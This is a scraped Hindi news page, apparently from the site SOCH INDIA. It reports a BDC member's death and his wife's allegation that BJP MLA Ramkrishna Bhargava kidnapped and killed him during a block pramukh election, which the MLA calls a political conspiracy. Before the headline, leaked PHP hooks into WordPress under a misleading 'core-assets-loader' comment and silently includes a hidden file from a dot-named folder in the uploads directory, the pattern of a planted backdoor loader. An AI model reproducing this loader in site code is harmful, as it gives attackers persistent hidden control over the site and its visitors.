add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बीडीसी सदस्य की मौत, बीजेपी विधायक रामकृष्ण भार्गव पर आरोप – SOCH INDIA
Menu

अपराध समाचार
बीडीसी सदस्य की मौत, बीजेपी विधायक रामकृष्ण भार्गव पर आरोप

nobanner

सीतापुर के मिश्रिख से बीजेपी विधायक रामकृष्ण भार्गव पर बीडीसी सदस्य की हत्या का आरोप लगा है. हालांकि उन्होंने इसे राजनीतिक षडयंत्र करार दिया और कहा कि समाजवादी पार्टी के लोग उन्हें इसमें फंसा रहे हैं. फिलहाल पुलिस मामले की जांच कर रही है और सीधे तौर पर कुछ नहीं कह रही है.

बीडीसी सदस्य संतोष की पत्नी ने कहा कि ब्लॉक प्रमुख चुनाव को लेकर बीजेपी विधायक उनके घर गए थे और जबरन उनके पति को अपने साथ ले गए थे. जब कुछ दिन वह घर नहीं लौटे तो पत्नी ने विधायक से इस बारे में पूछा. विधायक ने कहा कि वे लौट आएंगे लेकिन वापस लौटी उनकी लाश.

संतोष की पत्नी का आरोप है कि उसके पति को यातनाएं देकर मारा गया है. उन्होंने कहा कि पहले संतोष को किडनैप किया गया, फिर बंधक बनाकर हरदोई में रखा गया और फिर मार डाला गया. संतोष बेहद गरीब परिवार से ताल्लुक रखते थे और मजदूरी करके खर्च चलाते थे.

आरोप है कि अबने बेटे को ब्लॉक प्रमुख बनवाने के लिए बीजेपी विधायक रामकृष्ण भार्गव सारे हथकंडे अपना रहे थे और सभी बीडीसी सदस्यों को अपने पक्ष में करने का हर संभव प्रयास कर रहे थे. चुनाव से पहले कई बीडीसी सदस्यों को हरदोई में किसी जगह रखा गया था.

रामकृष्ण भार्गव ने समाजवादी पार्टी के पूर्व मंत्री रामपाल राजवंशी के ऊपर राजनीतिक साजिश का आरोप लगाया है. वहीं रामपाल राजवंशी का कहना है कि बीडीसी सदस्य की मौत भार्गव की मौजूदगी में हरदोई के विधायक श्याम प्रकाश के फार्म हाउस पर हुई.